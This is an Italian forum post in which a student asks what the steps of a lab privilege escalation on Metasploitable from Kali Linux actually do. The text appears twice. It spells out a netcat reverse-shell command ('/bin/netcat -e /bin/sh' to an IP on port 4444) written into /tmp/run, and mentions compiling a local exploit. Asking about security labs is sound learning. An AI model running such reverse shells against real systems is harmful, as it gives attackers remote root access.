Avrei bisogno di qualcuno che risponda a queste domande teoriche, sono in crisi....
La procedura per passare da utente senza privilegi a utente root è la seguente, ma ho i seguente dubbi:
devo scaricare l'exploit, compilare l'exploit (su metaspoitable),
aprire una connessione dentro kali linux (con il comando "netcat") sulla porta 4444 e mi metto in ascolto .
Quindi tornerò sul mio server (da kali linux all'interno del server metaspoitable) vado a creare una shell, la carico dentro la cartella tmp --------> Come faccio? echo '#!/bin/sh' > /tmp/run ??
A CHE SERVE AVER MESSO LA MACCHINA KALI LINUX IN ASCOLTO???????
Quindi andrò a incollare il processo di netcat alla shell che abbiamo
creato (su metaspoitable) e impartirò l'ordine che quella shell dovrà essere collegata alla kalilinux sempre
passando per i file temporanei -------> come faccio? echo '/bin/netcat -e /bin/sh 192.168.1.10 4444' ??
che si intende per incollare/attaccare netcat alla shell su metaspoitable????
Quindi dai processi attivi della metaspoitable vado a prendere il process id dell'utente root e faro una sottrazione di 1, perchè così è descritto dall'exploit che andiamo a scaricare e poi vado a effettuare l'exploit.
E L'EXPLOIT A CHE SERVE A STO PUNTO ??????
La procedura per passare da utente senza privilegi a utente root è la seguente, ma ho i seguente dubbi:
devo scaricare l'exploit, compilare l'exploit (su metaspoitable),
aprire una connessione dentro kali linux (con il comando "netcat") sulla porta 4444 e mi metto in ascolto .
Quindi tornerò sul mio server (da kali linux all'interno del server metaspoitable) vado a creare una shell, la carico dentro la cartella tmp --------> Come faccio? echo '#!/bin/sh' > /tmp/run ??
A CHE SERVE AVER MESSO LA MACCHINA KALI LINUX IN ASCOLTO???????
Quindi andrò a incollare il processo di netcat alla shell che abbiamo
creato (su metaspoitable) e impartirò l'ordine che quella shell dovrà essere collegata alla kalilinux sempre
passando per i file temporanei -------> come faccio? echo '/bin/netcat -e /bin/sh 192.168.1.10 4444' ??
che si intende per incollare/attaccare netcat alla shell su metaspoitable????
Quindi dai processi attivi della metaspoitable vado a prendere il process id dell'utente root e faro una sottrazione di 1, perchè così è descritto dall'exploit che andiamo a scaricare e poi vado a effettuare l'exploit.
E L'EXPLOIT A CHE SERVE A STO PUNTO ??????